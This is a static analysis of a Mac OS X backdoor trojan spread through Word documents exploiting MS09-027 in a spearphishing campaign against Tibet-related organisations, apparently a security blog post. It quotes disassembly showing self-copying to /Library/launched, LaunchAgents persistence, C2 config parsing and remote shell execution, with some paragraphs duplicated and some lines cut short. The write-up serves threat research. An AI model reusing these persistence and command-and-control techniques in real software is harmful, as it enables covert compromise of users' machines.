No Café in Tibet, Babe
As reported by Alienware, there is a new spearphishing email campaign circulating in the wild at the moment. The non-governmental organizations related to Tibet are being forwarded MS Office files that exploit MS09-027 vulnerability.
The malcrafted Microsoft Office Word documents carry a MacOS remote administration tool. When a user opens such document using Office for Mac, the shellcode will drop and execute the backdoor trojan and then it will open up a document with a political content related to Tibet.
The Alienware write-up provides details about the embedded script and dynamic characteristics of the backdoor trojan.
Let's analyse this trojan statically to reveal the full scope of its functionality.
First, the Word document binary dump reveals that a bash script that launches the dropped document is followed with
When started, the executable will check if its own file name matches
If its own path file name is not
Next, it will create a directory
Next, it will open its own file and read command-and-control server details that are appended at the end of the file. The domain name will then be resolved with
The presence of the configuration data in the file is visible as:
Following that, the trojan collects system information that includes operating system version, user/machine name, and then submits it to the remote host.
Finally, the backdoor falls into a loop in which it queries the remote server and receives the following commands to perform:
When a shell command is executed, its output will be redirected and submitted to the server in a separate thread
Such arsenal of the remote commands allows turning the compromised MacOS X system into a zombie, giving full control to the remote attacker.
The malcrafted Microsoft Office Word documents carry a MacOS remote administration tool. When a user opens such document using Office for Mac, the shellcode will drop and execute the backdoor trojan and then it will open up a document with a political content related to Tibet.
The Alienware write-up provides details about the embedded script and dynamic characteristics of the backdoor trojan.
Let's analyse this trojan statically to reveal the full scope of its functionality.
First, the Word document binary dump reveals that a bash script that launches the dropped document is followed with
0xCAFEBABE
("cafe babe") bytes that mark a Mach-O fat file binary:When started, the executable will check if its own file name matches
"/Library/launched"
:
DropItselfAsLibraryLaunched:
...
mov edx, ds:executablePath
mov [esp+4], edx
mov [esp], eax
; get current executable path
call _objc_msgSend
mov edi, eax
mov esi, ds:Library_launched
mov [esp+8], esi
mov eax, ds:isEqualToString_drain
mov [esp+4], eax
mov [esp], edi
; is it "/Library/launched"?
call _objc_msgSend
mov edx, 1
test al, al
jnz quit ; if so, then quit
If its own path file name is not
"/Library/launched"
, it will delete a file at that location if it exists, and then it will copy itself under that name.
mov dword ptr [esp+8], offset LibraryLaunched
mov eax, ds:fileExistsAtPath
mov [esp+4], eax
mov [esp], ebx
; does /Library/launched exist?
call _objc_msgSend
test al, al
jz short copy_itself
mov dword ptr [esp+8], offset LibraryLaunched ; "/Library/launched"
mov eax, ds:isDeletableFileAtPath
mov [esp+4], eax
mov [esp], ebx
; can it be deleted?
call _objc_msgSend
test al, al
jz short copy_itself
mov dword ptr [esp+0Ch], 0
mov dword ptr [esp+8], offset LibraryLaunched ; "/Library/launched"
mov eax, ds:removeItemAtPath
mov [esp+4], eax
mov [esp], ebx
; delete the file
call _objc_msgSend
copy_itself:
mov dword ptr [esp+10h], 0
mov [esp+0Ch], esi
mov [esp+8], edi
mov eax, ds:moveItemAtPath_toPath
mov [esp+4], eax
mov [esp], ebx
; copy itself
call _objc_msgSend
Next, it will create a directory
"/Library/LaunchAgents/"
and within that directory it will create a configuration file com.apple.FolderActionsxl.plist
. One of the specified parameters, RunAtLoad
, will make sure the trojan starts whenever the system starts.
CretePlistFile:
...
mov dword ptr [esp+20h], 0
mov dword ptr [esp+1Ch], offset Runatload ; "RunAtLoad"
mov [esp+18h], eax
mov dword ptr [esp+14h], offset Program ; "Program"
mov eax, [ebp+arg_0]
mov [esp+10h], eax
mov dword ptr [esp+0Ch], offset Label ; "Label"
mov [esp+8], ebx
mov eax, ds:dictionaryWithObjectsAndKeys
mov [esp+4], eax
mov eax, ds:NSDictionary
mov [esp], eax
; create NSDictionary
; with the couples above
call _objc_msgSend
mov dword ptr [esp+0Ch], 1
mov edx, [ebp+var_1C]
mov [esp+8], edx
mov edx, ds:writeToFile_atomically
mov [esp+4], edx
mov [esp], eax
; save them into config
call _objc_msgSend
Next, it will open its own file and read command-and-control server details that are appended at the end of the file. The domain name will then be resolved with
gethostbyname()
API to obtain the IP address of the server. Please note that code relies on an existence of the marker 0x013268B2
:
mov [esp+0Ch], ebx
mov dword ptr [esp+8], 214h
mov dword ptr [esp+4], 1
lea esi, [ebp+var_230]
mov [esp], esi
; read config data (0x214 bytes)
call _fread
cmp eax, 214h
jnz short exit
cmp [ebp+marker], 13268B2h ; check marker 0x013268B2
jnz short exit
mov eax, [ebp+Numeric_IP]
test eax, eax ; is there numeric IP specified?
jnz short IP_is_Ok ; IP exists, skip
lea eax, [ebp+domain_name] ; no IP, resolve domain name
mov [esp+4], eax
mov dword ptr [esp], offset DomainName
call _strcpy
mov dword ptr [esp], offset DomainName
; resolve with gethostbyname()
call Domain2Ip
test al, al
jnz short next
mov dword ptr [esp], offset DomainToIpError
; log error "Domain to ip error!"
call _NSLog
mov dword ptr [esp], 0FFFFFFFFh
; exit
call _exit
IP_is_Ok:
mov [esp+4], esi
mov dword ptr [esp], offset ClientIP
call _strcpy
next:
mov eax, [ebp+server_port]
mov ds:Port, eax
mov [esp], ebx
; close the file
call _fclose
The presence of the configuration data in the file is visible as:
Following that, the trojan collects system information that includes operating system version, user/machine name, and then submits it to the remote host.
Finally, the backdoor falls into a loop in which it queries the remote server and receives the following commands to perform:
- Shut down the system
- Get system information
- Send the list of processes
- Run shell command
- Enlist files in the directories
- Send over specified file(s)
- Receive and save file(s)
- Delete specified files and directories
- Execute specified files
When a shell command is executed, its output will be redirected and submitted to the server in a separate thread
Thread_Function_RecvCommandDataPv()
as shown below (e.g. an "ls"
command will enlist files and the output with the enlisted file and directory names will be submitted to the remote server):
Function_Cmd:
...
mov edx, [ebp+var_D4]
mov [esp+8], edx
mov eax, ds:setStandardOutput
mov [esp+4], eax
mov [esp], edi
call _objc_msgSend
mov dword ptr [esp+8], offset cfstr_BinSh ; "/bin/sh"
mov eax, ds:setLaunchPath
mov [esp+4], eax
mov [esp], edi
call _objc_msgSend
mov eax, ds:launch
mov [esp+4], eax
mov [esp], edi
call _objc_msgSend
mov ecx, [ebp+var_D0]
mov [ebp+var_38], ecx
mov [ebp+var_34], esi
lea eax, [ebp+var_38]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset Thread_Function_RecvCommandDataPv
mov dword ptr [esp+4], 0
lea eax, [ebp+var_30]
mov [esp], eax
; spawn a thread that submits command output
call _pthread_create
Such arsenal of the remote commands allows turning the compromised MacOS X system into a zombie, giving full control to the remote attacker.